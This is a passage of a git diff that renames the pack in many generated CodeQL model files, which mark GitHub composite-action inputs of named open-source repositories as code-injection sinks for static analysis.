b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml index 4e953d695f82..9a20261be903 100644 --- a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openvinotoolkit/openvino", "*", "input.skip_when_only_listed_files_changed", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml index 32040ef84eac..a8c9d3fabcee 100644 --- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.layout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml index b258ea1ce2da..c222d5e1fd95 100644 --- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openzeppelin/openzeppelin-contracts", "*", "input.layout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml index c0a51345ae6f..0a8427f29e4f 100644 --- a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml +++ b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["oppia/oppia", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml index f362cd1f72b7..52a2001db13a 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["oracle/graal", "*", "input.components", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml index 35474e6c68f9..28d8cabc3684 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["oracle/truffleruby", "*", "input.archive", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml index ce961ee6a75b..f3ef49171464 100644 --- a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml +++ b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["orhun/git-cliff", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml index 9ad4bb306662..6150422d177f 100644 --- a/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml +++ b/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["oven-sh/bun", "*", "input.download-url", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml index 5fca46427e00..ad99ed2b432a 100644 --- a/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml +++ b/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["owntracks/android", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml index 9f0fecbe10b9..5df1a5f22302 100644 --- a/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml +++ b/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pandas-dev/pandas", "*", "input.meson_args", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml index cadf01dbff1e..b2c5857a743a 100644 --- a/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pardeike/harmony", "*", "input.architecture", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml index ec4fc1da053c..93996601c8af 100644 --- a/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/composite-actions/pennylaneai_pennylane.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pennylaneai/pennylane", "*", "input.requirements_file", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml index e6530a19d972..c1d90d6ab0a8 100644 --- a/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml +++ b/ql/lib/ext/generated/composite-actions/phalcon_cphalcon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["phalcon/cphalcon", "*", "input.target-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml index 0bae4e91cde0..d29d4d5674d5 100644 --- a/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml +++ b/ql/lib/ext/generated/composite-actions/philosowaffle_peloton-to-garmin.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["philosowaffle/peloton-to-garmin", "*", "input.framework", "code-injection", "generated"] - ["philosowaffle/peloton-to-garmin", "*", "input.os", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["philosowaffle/peloton-to-garmin", "*", "input.os", "output.artifact_name", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml index 0acb53ba1d3a..0aaacca4805c 100644 --- a/ql/lib/ext/generated/composite-actions/php_php-src.model.yml +++ b/ql/lib/ext/generated/composite-actions/php_php-src.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["php/php-src", "*", "input.jitType", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml index f1b755e796b5..b69a77400798 100644 --- a/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml +++ b/ql/lib/ext/generated/composite-actions/phpdocumentor_phpdocumentor.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["phpdocumentor/phpdocumentor", "*", "input.passphrase", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml index 7d1733d647ac..6ab3f7d2bf57 100644 --- a/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml +++ b/ql/lib/ext/generated/composite-actions/pinecone-io_pinecone-python-client.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pinecone-io/pinecone-python-client", "*", "input.googleapis_common_protos_version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml index 4bf33c9a343d..f5ce35d96ad5 100644 --- a/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml +++ b/ql/lib/ext/generated/composite-actions/pixijs_pixijs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pixijs/pixijs", "*", "input.npm-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml index 9ca004a7c155..519adffb097b 100644 --- a/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml +++ b/ql/lib/ext/generated/composite-actions/posthog_posthog.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["posthog/posthog", "*", "input.group", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/primer_react.model.yml b/ql/lib/ext/generated/composite-actions/primer_react.model.yml index fc3870d89a8e..69d0355d7202 100644 --- a/ql/lib/ext/generated/composite-actions/primer_react.model.yml +++ b/ql/lib/ext/generated/composite-actions/primer_react.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["primer/react", "*", "input.token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml index 1d621562771e..97a694393759 100644 --- a/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml +++ b/ql/lib/ext/generated/composite-actions/project-chip_connectedhomeip.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["project-chip/connectedhomeip", "*", "input.with", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml index f09b364127e6..54e557061dfb 100644 --- a/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml +++ b/ql/lib/ext/generated/composite-actions/projectnessie_nessie.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["projectnessie/nessie", "*", "input.job-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/psf_black.model.yml b/ql/lib/ext/generated/composite-actions/psf_black.model.yml index 56e7b8142316..12ed97f6af51 100644 --- a/ql/lib/ext/generated/composite-actions/psf_black.model.yml +++ b/ql/lib/ext/generated/composite-actions/psf_black.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["psf/black", "*", "input.summary", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml index 9f953b32ab17..2c64a6978afe 100644 --- a/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml +++ b/ql/lib/ext/generated/composite-actions/pyca_cryptography.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pyca/cryptography", "*", "input.key", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml index 257b77bc2c34..f7982d2244a4 100644 --- a/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml +++ b/ql/lib/ext/generated/composite-actions/pyg-team_pytorch_geometric.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["pyg-team/pytorch/geometric", "*", "input.torchvision-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml index 49f2f86907f9..9678f3204257 100644 --- a/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml +++ b/ql/lib/ext/generated/composite-actions/python-poetry_poetry.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["python-poetry/poetry", "*", "input.args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml index 1e33c5e540aa..2ee43fbcf6cd 100644 --- a/ql/lib/ext/generated/composite-actions/python_mypy.model.yml +++ b/ql/lib/ext/generated/composite-actions/python_mypy.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["python/mypy", "*", "input.install_project_dependencies", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml index cfbf15549c48..2560e80f52c4 100644 --- a/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml +++ b/ql/lib/ext/generated/composite-actions/quarto-dev_quarto-cli.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["quarto-dev/quarto-cli", "*", "input.keychain-pw", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml index 24730af3d77a..17e4f893d390 100644 --- a/ql/lib/ext/generated/composite-actions/quay_clair.model.yml +++ b/ql/lib/ext/generated/composite-actions/quay_clair.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["quay/clair", "*", "input.tag", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml index 6be5abd09dd7..dde14bfa277d 100644 --- a/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml +++ b/ql/lib/ext/generated/composite-actions/quickwit-oss_quickwit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["quickwit-oss/quickwit", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml index 145b6f0d0e3e..0aabf2e1d7f1 100644 --- a/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/r-lib_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["r-lib/actions", "*", "input.lockfile-create-lib", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml index c8b05bfd904b..6fdfb2e6eba0 100644 --- a/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml +++ b/ql/lib/ext/generated/composite-actions/randombit_botan.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["randombit/botan", "*", "input.target", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml index 04c218a76c1b..b068e810823e 100644 --- a/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml +++ b/ql/lib/ext/generated/composite-actions/raspberrypi_documentation.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["raspberrypi/documentation", "*", "input.secondary_host", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml index 5447d4b7e2ed..9107fd9e85cf 100644 --- a/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml +++ b/ql/lib/ext/generated/composite-actions/ray-project_kuberay.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ray-project/kuberay", "*", "input.ray_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml index 825ce27511d7..ee81ae110455 100644 --- a/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml +++ b/ql/lib/ext/generated/composite-actions/readthedocs_actions.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["readthedocs/actions", "*", "input.single-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml index 8f3e49c9768a..a8030627789f 100644 --- a/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml +++ b/ql/lib/ext/generated/composite-actions/reflex-dev_reflex.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["reflex-dev/reflex", "*", "input.create-venv-at-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml index 1937367debc7..a89b000bedff 100644 --- a/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml +++ b/ql/lib/ext/generated/composite-actions/renovatebot_renovate.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["renovatebot/renovate", "*", "input.node-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml index 01b77b7ccc6d..a98ea12496f6 100644 --- a/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml +++ b/ql/lib/ext/generated/composite-actions/rethinkdb_rethinkdb.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rethinkdb/rethinkdb", "*", "input.command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml index edbd28d401bf..8475ef342402 100644 --- a/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml +++ b/ql/lib/ext/generated/composite-actions/risc0_risc0.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["risc0/risc0", "*", "input.key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml index 4b31bd66c5a6..fff5eaab1f49 100644 --- a/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml +++ b/ql/lib/ext/generated/composite-actions/rocketchat_rocket.chat.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rocketchat/rocket.chat", "*", "input.build-containers", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml index a186fa070b0b..5d0cef62b0b4 100644 --- a/ql/lib/ext/generated/composite-actions/rook_rook.model.yml +++ b/ql/lib/ext/generated/composite-actions/rook_rook.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rook/rook", "*", "input.use-tmate", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml index 92ee2971e3a2..3edfa5ef14db 100644 --- a/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml +++ b/ql/lib/ext/generated/composite-actions/roots_trellis.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["roots/trellis", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml index 07b8e96bfe29..d5f640e91a59 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_debug.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ruby/debug", "*", "input.report-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml index 2a2a5baab45d..32945cb21e30 100644 --- a/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/ruby_ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ruby/ruby", "*", "input.builddir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml index 274fab01e921..42eeca98de4c 100644 --- a/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml +++ b/ql/lib/ext/generated/composite-actions/rusefi_rusefi.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["rusefi/rusefi", "*", "input.RUSEFI_OBFUSCATED_PUBLIC_SSH_SERVER", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml index 3671de9e58af..5c0777ce394a 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["saltstack/salt", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml index 2ef34dac8ba7..ac777af02856 100644 --- a/ql/lib/ext/generated/composite-actions/saltstack_salt.yml +++ b/ql/lib/ext/generated/composite-actions/saltstack_salt.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["saltstack/salt", "*", "input.version", "output.version", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml index d76f20031e7e..26a587e4f5c6 100644 --- a/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml +++ b/ql/lib/ext/generated/composite-actions/sap_sapmachine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["sap/sapmachine", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml index eccb5dae2bd7..a26ebcfa57dc 100644 --- a/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/scala-native_scala-native.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["scala-native/scala-native", "*", "input.llvm-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml index 3cbd3330ccd1..bf39b24e8411 100644 --- a/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml +++ b/ql/lib/ext/generated/composite-actions/scitools_iris.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["scitools/iris", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml index 73c9c1f24a2b..00cb4906bb51 100644 --- a/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/scylladb_scylla-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["scylladb/scylla-operator", "*", "input.containerImageName", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml index 90c4f699308a..85f583a5e880 100644 --- a/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml +++ b/ql/lib/ext/generated/composite-actions/shader-slang_slang.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["shader-slang/slang", "*", "input.platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml index ed4e8820c998..207b5705e513 100644 --- a/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml +++ b/ql/lib/ext/generated/composite-actions/shaka-project_shaka-player.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["shaka-project/shaka-player", "*", "input.state", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml index df51b9fe4c84..f0f3be91b4ba 100644 --- a/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml +++ b/ql/lib/ext/generated/composite-actions/shakacode_react-webpack-rails-tutorial.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["shakacode/react-webpack-rails-tutorial", "*", "input.org", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml b/ql/lib/ext/generated/composite-actions/simple-icons_simple-icons.model.yml index 8fca8591ceb6..04e779b9579a 100644 --- 